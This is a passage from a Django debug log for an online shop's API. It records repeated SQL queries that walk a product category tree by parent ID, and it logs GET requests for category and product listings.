"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:43:02,444 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:43:02,446 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:43:02,449 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:43:02,452 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:43:02,456 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:43:02,459 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:43:02,461 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:43:02,463 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:43:02,465 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:43:02,468 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:43:02,471 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:43:02,473 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:43:02,475 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:43:02,478 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:43:02,480 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:43:02,483 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:43:02,486 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:43:02,488 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:43:02,490 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:43:02,492 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:43:02,496 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:43:02,498 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:43:02,500 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:43:02,502 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:43:02,505 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:43:02,507 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:43:02,510 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:43:02,512 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:43:02,514 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:43:02,517 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:43:02,519 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:43:02] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 09:43:02,630 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-18 09:43:02,638 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [18/Dec/2019 09:43:02] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-18 09:43:05,464 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 09:43:05,471 utils 4252 140031721535232 (0.004) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 09:43:05] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-18 09:46:08,474 utils 4252 140031721535232 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 09:46:08,481 utils 4252 140031721535232 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 09:46:08] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-18 09:46:22,106 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 09:46:22,110 utils 4252 140031721535232 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 09:46:22] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-18 09:46:33,289 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:46:33,300 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:46:33,306 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:46:33,310 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:46:33,316 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:46:33,320 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:46:33,324 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:46:33,328 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:46:33,332 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:46:33,339 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:46:33,343 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:46:33,347 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:46:33,351 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:46:33,355 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:46:33,361 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:46:33,365 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:46:33,368 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:46:33,372 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:46:33,376 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:46:33,383 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:46:33,387 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:46:33,391 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:46:33,395 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:46:33,399 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:46:33,403 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:46:33,411 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:46:33,418 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:46:33,422 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", 